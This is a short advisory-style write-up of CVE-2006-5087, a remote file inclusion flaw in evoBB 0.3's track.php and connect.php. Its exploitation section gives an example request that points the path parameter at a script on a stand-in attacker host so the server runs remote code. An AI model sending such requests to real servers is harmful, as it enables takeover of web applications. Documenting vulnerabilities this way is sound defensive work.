CVE-2006-5087

Vulnerability

A PHP remote file inclusion vulnerability exists in evoBB version 0.3 and earlier. The vulnerable code in track.php uses require_once($path.'connect.php'); without sanitizing the $path parameter, which is taken directly from user input via the path GET parameter. Similarly, connect.php is also vulnerable. An attacker can supply a URL as the path parameter, causing the server to include and execute arbitrary remote PHP code. [1]

Exploitation

An attacker can exploit this vulnerability by sending a crafted HTTP request to either track.php or connect.php with the path parameter set to a URL hosting malicious PHP code. No authentication or prior access is required. For example, requesting http://target.com/evoBB/track.php?path=http://attacker.com/shell.txt will cause the server to include and execute the remote script. [1]

Impact

Successful exploitation allows an attacker to execute arbitrary PHP code on the web server with the privileges of the web server process. This can lead to full compromise of the web application, including data theft, defacement, or further server-side attacks.

Mitigation

No official patch or updated version has been released for this vulnerability. The software appears to be abandoned. Users should immediately remove or disable the vulnerable files (track.php and connect.php) or migrate to an alternative forum solution. As of the publication date, no workaround is available.